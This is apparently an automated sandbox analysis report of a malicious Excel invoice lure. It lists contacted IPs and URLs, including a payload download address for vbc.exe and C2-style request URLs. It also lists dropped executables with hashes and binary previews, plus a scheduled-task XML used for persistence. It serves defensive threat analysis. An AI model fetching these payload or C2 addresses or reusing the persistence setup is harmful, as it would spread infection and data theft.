http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 0000000A.00000000.1038616558.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026858297.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://investor.msn.com/	explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 0000000A.00000000.1037414892.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1009836378.000000000869E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 0000000A.00000000.1013251551.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org	explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.piriform.com/ccleanerv	explorer.exe, 0000000A.00000000.1033807788.0000000004385000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 0000000A.00000000.1006808699.0000000006450000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://198.12.89.166/55/vbc.exeg	EQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.12.89.166	unknown	United States	36352	AS-COLOCROSSINGUS	true
5.183.8.183	www.dems-clicks.com	Germany	64463	INTERXSCH	true
185.53.179.171	www.employeebnsf.com	Germany	61969	TEAMINTERNET-ASDE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626593
Start date and time: 14/05/202215:09:33	2022-05-14 15:09:33 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PROFORMA INVOICE.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@13/16@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 25.5% (good quality ratio 24.3%) Quality average: 71.1% Quality standard deviation: 28.9%
HCA Information:	Successful, ratio: 96% Number of executed functions: 155 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .xlsx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:10:44	API Interceptor	88x Sleep call for process: EQNEDT32.EXE modified
15:10:49	API Interceptor	143x Sleep call for process: vbc.exe modified
15:10:58	API Interceptor	10x Sleep call for process: powershell.exe modified
15:10:59	API Interceptor	1x Sleep call for process: schtasks.exe modified
15:11:37	API Interceptor	247x Sleep call for process: mstsc.exe modified
15:12:11	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
5.183.8.183	NEW ORDER LIST JUNE 2022.xlsx	Get hash	malicious	Browse	www.dems-clicks.com/n6g4/?bJEdePb=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&z4wh1=K2JhQ8u0d8xdq0
	v444BZjqsC.exe	Get hash	malicious	Browse	www.dems-clicks.com/n6g4/?j2=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qrWEsotjxvV&6lpt=1bzlovchh8
	PRO.INV.xlsx	Get hash	malicious	Browse	www.dems-clicks.com/n6g4/?g8it=2dwXw8MPNFJH9&j4=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==
185.53.179.171	WWVN_INVOICE_8363567453.vbs	Get hash	malicious	Browse	www.repaircilinic.com/wn19/
	PRO.INV.xlsx	Get hash	malicious	Browse	www.employeebnsf.com/n6g4/?g8it=2dwXw8MPNFJH9&j4=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==&7-nw=RxoDX6DX
	RFQ_AP65425652_032421.exe	Get hash	malicious	Browse	www.healthebreak.com/sc21/?T0GL3=BeQcCI3gxZ8kazefRQ+B1a219Kf9j/7UZZGDQ4Fgc3CNO9P1ko9Soc+yTo6Vt/PTSzf7&cJEHR=5j0tnfZ8

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.employeebnsf.com	PRO.INV.xlsx	Get hash	malicious	Browse	185.53.179.171
www.dems-clicks.com	NEW ORDER LIST JUNE 2022.xlsx	Get hash	malicious	Browse	5.183.8.183
	v444BZjqsC.exe	Get hash	malicious	Browse	5.183.8.183
	PRO.INV.xlsx	Get hash	malicious	Browse	5.183.8.183

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	1isequal9.arm	Get hash	malicious	Browse	104.170.219.191
	New order.xlsx	Get hash	malicious	Browse	104.168.33.25
	Bank TT slip.xlsx	Get hash	malicious	Browse	172.245.27.27
	scan-copy.xlsx	Get hash	malicious	Browse	198.12.89.207
	Vsl PRIDE PACIFIC .xlsx	Get hash	malicious	Browse	107.172.93.57
	GujVgIhAhF	Get hash	malicious	Browse	172.245.26.223
	PO 65738963578 Revise Settlement.xlsx	Get hash	malicious	Browse	198.12.81.20
	PO TO GIS #0890.xlsx	Get hash	malicious	Browse	107.175.218.31
	shipn_docs.xlsx	Get hash	malicious	Browse	192.3.152.135
	Order_List.xlsx	Get hash	malicious	Browse	104.168.33.12
	bank swiftcopy.xlsx	Get hash	malicious	Browse	198.12.91.249
	Paymentnotification115.xlsx	Get hash	malicious	Browse	192.3.121.203
	ORDER M52022.xlsx	Get hash	malicious	Browse	107.175.3.53
	Product_List.xlsx	Get hash	malicious	Browse	192.227.158.85
	Lawsuit-120522.xlsx	Get hash	malicious	Browse	104.168.33.121
	New order.xlsx	Get hash	malicious	Browse	104.168.33.25
	PO0975.xlsx	Get hash	malicious	Browse	172.245.120.113
	soa.xlsx	Get hash	malicious	Browse	172.245.27.27
	Bank Details.xlsx	Get hash	malicious	Browse	198.12.89.207
	43127-20220512.xlsx	Get hash	malicious	Browse	107.175.212.60
TEAMINTERNET-ASDE	product Enquiry.exe	Get hash	malicious	Browse	185.53.179.174
	SecuriteInfo.com.Variant.Jaik.72878.26519.exe	Get hash	malicious	Browse	185.53.179.93
	SecuriteInfo.com.Variant.Jaik.72878.19052.exe	Get hash	malicious	Browse	185.53.179.170
	http://blindsignals.com/index.php/2009/07/jquery-delay	Get hash	malicious	Browse	185.53.177.50
	nuevo pedido.pdf.exe	Get hash	malicious	Browse	185.53.179.174
	WWVN_INVOICE_8363567453.vbs	Get hash	malicious	Browse	185.53.179.171
	WWVN_INVOICE_8363567453.vbs	Get hash	malicious	Browse	185.53.179.170
	http://blindsignals.com/index.php/2009/07/jquery-delay/	Get hash	malicious	Browse	185.53.177.50
	PRO.INV.xlsx	Get hash	malicious	Browse	185.53.179.171
	http://www.hubookstore.com	Get hash	malicious	Browse	185.53.178.30
	Bill of Lading.exe	Get hash	malicious	Browse	185.53.179.172
	Bftkdpihzmqqayhvbimrsgovwrhmxmgnqx.exe	Get hash	malicious	Browse	185.53.179.170
	swift copy$48,400.exe	Get hash	malicious	Browse	185.53.179.170
	New order is attached.exe	Get hash	malicious	Browse	185.53.177.51
	Confirmation Transfer Ref_MT103_002345689109920098.exe	Get hash	malicious	Browse	185.53.178.51
	DgMnD2zCnE.exe	Get hash	malicious	Browse	185.53.177.50
	Zahlungsaviso.exe	Get hash	malicious	Browse	185.53.179.93
	knLUdROliq.exe	Get hash	malicious	Browse	185.53.177.31
	bena.exe	Get hash	malicious	Browse	185.53.179.172
	Urgentn#U00a1 objedn#U00a0vka.pdf.exe	Get hash	malicious	Browse	185.53.179.91
INTERXSCH	NEW ORDER LIST JUNE 2022.xlsx	Get hash	malicious	Browse	5.183.8.183
	v444BZjqsC.exe	Get hash	malicious	Browse	5.183.8.183
	Payment confirmation reference.exe	Get hash	malicious	Browse	5.183.8.187
	PRO.INV.xlsx	Get hash	malicious	Browse	5.183.8.183
	SecuriteInfo.com.Trojan.Siggen17.48628.31246.exe	Get hash	malicious	Browse	5.183.8.28

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	731648
Entropy (8bit):	7.625561793309267
Encrypted:	false
SSDEEP:	12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
MD5:	F7ECD12D134AAF3541396C78337CE672
SHA1:	BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
SHA-256:	EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
SHA-512:	EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
IE Cache URL:	http://198.12.89.166/55/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......F.(........(.......(..........(..........(........{...."..}....&.(......F.(........(.......(..........(..........(........0...........(.....o......o.....+...0...........(.....o......o.....+...0...........(.....o.......o.....+......0...........(.....o.......o.....+......0.. ........(.....o.......o......o$....+...0.. ........(.....o.......o......o$....+...(....o.....(....o....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13D6C471.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	5.070400845866794
Encrypted:	false
SSDEEP:	96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
MD5:	1A4FF280B6D51A6ED16C3720AF1CD6EE
SHA1:	277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
SHA-256:	E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
SHA-512:	3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
Malicious:	false
Reputation:	unknown
Preview:	...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................\|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19CBAA30.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	223752
Entropy (8bit):	3.2805343869701504
Encrypted:	false
SSDEEP:	1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
MD5:	8E3A74F7AA420B02D34C69E625969C0A
SHA1:	4743F57F0F702C5B47FA1668D9173E08ADA16448
SHA-256:	0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
SHA-512:	ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
Malicious:	false
Reputation:	unknown
Preview:	....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A37827C.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	5.125773446782967
Encrypted:	false
SSDEEP:	48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
MD5:	30935B0D56A69E2E57355F8033ADF98B
SHA1:	5F7C13E36023A1B3B3DAF030291C02631347C2AB
SHA-256:	077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
SHA-512:	5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
Malicious:	false
Reputation:	unknown
Preview:	.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!......2...9...?...C...F...G...F...C...?...9...2......!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6731B0A7.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	5.070400845866794
Encrypted:	false
SSDEEP:	96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
MD5:	1A4FF280B6D51A6ED16C3720AF1CD6EE
SHA1:	277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
SHA-256:	E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
SHA-512:	3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
Malicious:	false
Reputation:	unknown
Preview:	...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................\|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C335FFBE.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	5.125773446782967
Encrypted:	false
SSDEEP:	48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
MD5:	30935B0D56A69E2E57355F8033ADF98B
SHA1:	5F7C13E36023A1B3B3DAF030291C02631347C2AB
SHA-256:	077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
SHA-512:	5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
Malicious:	false
Reputation:	unknown
Preview:	.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!......2...9...?...C...F...G...F...C...?...9...2......!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

C:\Users\user\AppData\Local\Temp\tmp7282.tmp

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1577
Entropy (8bit):	5.113645733916735
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNto5xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTovv
MD5:	FDC08A9D9384CA53A1F040486088074E
SHA1:	BF3EE025224AE243E0B9DBB9A3C3A654176B0709
SHA-256:	BC94AB97074174934C306ED9FE72253914EE774FD143A696D995B4D8592D259E
SHA-512:	B3773A3B20216F20BA79C49DB1F7380E3FEDD10643CBA71746881F67B0EA039595AF440109D1A8B89336A5892948D4C0E33987D325FDFECAF2F945775FCCED91
Malicious:	true
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\~DF3A9718BB32954321.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6BDEF7AB5AFB6A2C.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB5BF52C584DCD599.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	CDFV2 Encrypted
Category:	dropped
Size (bytes):	95744
Entropy (8bit):	7.91695700296717
Encrypted:	false
SSDEEP:	1536:c3ir/an65WHrmE9mfKMkBIvMBMVMO9C9SpX5xhhgD7uJbbi+7MgFlUveeAM:cSW68Lm/fKMk6tHCWToIXi+/nTF
MD5:	5B9DDBDF0A0AF0788EECEEACEC2F0295
SHA1:	77687D59ABBD0B3C4EECC80ABBE30D33A47E781C
SHA-256:	E11F7D510B899E00E0CF10DC360400FD38F180E9C72F42C465C3A470075CD9EA
SHA-512:	1657E35379AA82ABE0EDD01DA1CF97CB6BBABCDE9788C2E7B433F12DF627320F29A519A502D71E66B39A40CD5DD908594C907CD69EACBCEAB797BFAC6085CCF7
Malicious:	false
Reputation:	unknown
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Temp\~DFC72BCB116CB2ED22.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80IVWTICKZQK6HB0AL5T.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5864064270168288
Encrypted:	false
SSDEEP:	96:chQCAMqGqvsqvJCwoLz8hQCAMqGqvsEHyqvJCworJzG7KrlHggx8+lUVdBb:cm7oLz8mvHnorJzGmigx87Bb
MD5:	46F08F94CD341EF8C7FBA87CBCE16DA9
SHA1:	9CFAA57A020F6B91F77BF33DFB601AA37E0C8BCA
SHA-256:	08A7E978FECF8831DA15E753F1BDE5AFA2C5E9E346AEA2D779025F125FECF54D
SHA-512:	CA273C0212C496649A36420342F519F36397A4682853EE763104175C0701F312BF7DA82C2FC688F45E7D8EDF977CF3CE9694FF1A94DFBAC24051599068BCC1D5
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5864064270168288
Encrypted:	false
SSDEEP:	96:chQCAMqGqvsqvJCwoLz8hQCAMqGqvsEHyqvJCworJzG7KrlHggx8+lUVdBb:cm7oLz8mvHnorJzGmigx87Bb
MD5:	46F08F94CD341EF8C7FBA87CBCE16DA9
SHA1:	9CFAA57A020F6B91F77BF33DFB601AA37E0C8BCA
SHA-256:	08A7E978FECF8831DA15E753F1BDE5AFA2C5E9E346AEA2D779025F125FECF54D
SHA-512:	CA273C0212C496649A36420342F519F36397A4682853EE763104175C0701F312BF7DA82C2FC688F45E7D8EDF977CF3CE9694FF1A94DFBAC24051599068BCC1D5
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	731648
Entropy (8bit):	7.625561793309267
Encrypted:	false
SSDEEP:	12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
